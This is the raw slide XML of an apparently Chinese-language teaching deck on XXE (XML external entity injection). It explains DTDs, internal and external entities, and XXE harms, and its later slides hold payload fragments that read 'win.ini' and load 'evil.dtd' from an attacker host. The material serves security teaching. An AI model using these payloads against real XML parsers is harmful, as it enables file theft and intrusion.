              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求、执行端口扫描等。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拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者可以通过构造恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实体来导致应用程序消耗过多的资源，从而引发拒绝服务攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="pingfang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML External Entity Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XMl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞触发点往往是可以上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的位置，没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件进行过滤，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行、内网端口扫描、攻击内网网站、发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击等危害 </a:t>
            </a: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509622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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞的危害</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39468161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4" y="2504061"/>
            <a:ext cx="11933932" cy="8956298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前置介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档结构包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>声明、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档类型定义（可选）、文档元素</a:t>
            </a:r>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en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!--XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>声明</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p>
          <a:p>
            <a:pPr algn="l"/>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文档类型定义</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note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [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定义此文档是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>类型的文档</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note (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to,from,heading,body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt;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note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>元素有四个元素</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to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to</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from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from</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head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head</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body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body</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文档元素</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note</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to</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Dave</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to</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from</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Tom</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from</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head</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Reminder</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head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body</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You are a good man</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body</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note</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endParaRPr lang="zh-CN" altLang="en-US" sz="2800"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753278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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD0C2E8-7FA3-31BD-03D8-8C4EBC08E225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13908505" y="2557123"/>
            <a:ext cx="9504947" cy="9140964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（文档类型定义，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DocumentType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）的作用是定义 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档的合法构建模块，它使用一系列的合法元素来定义文档结构，可以在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档内声明，也可以外部引用。</a:t>
            </a:r>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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，可以定义内部实体（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和外部实体。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内部实体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内部实体是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中定义的实体，它可以用来表示文本片段。内部实体使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!ENTITY&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>声明来定义，并在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中使用实体引用来引用它们。例如，定义一个内部实体引用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY name "value"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，然后可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;name;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来引用该实体。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：外部实体是指在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之外定义的实体。外部实体可以是一个外部文件的引用，这个文件包含了实体的定义和内容。外部实体使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!ENTITY&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>声明，并指定一个外部实体的系统标识符或公共标识符来引用外部实体。例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY name SYSTEM "external.xml"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定了一个外部实体引用，它引用了名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的外部实体，该实体定义在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>external.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2678723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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C194297A-0074-8C53-D2AC-B0D55748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2821837"/>
            <a:ext cx="13858875" cy="897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4" y="2504061"/>
            <a:ext cx="13473974" cy="9571851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体声明</a:t>
            </a:r>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 SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///c:/windows/win.ini"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>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en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档引入外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档中的外部实体声明</a:t>
            </a:r>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://192.168.0.11/evil.dtd"</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%d;</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en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体声明引入外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档中的外部实体声明</a:t>
            </a:r>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d PUBLIC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"PUBLIC_ID"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://192.168.0.11/evil.dtd"</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%d;</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zh-CN" altLang="en-US" sz="2800"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753278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XML</a:t>
            </a:r>
            <a:r>
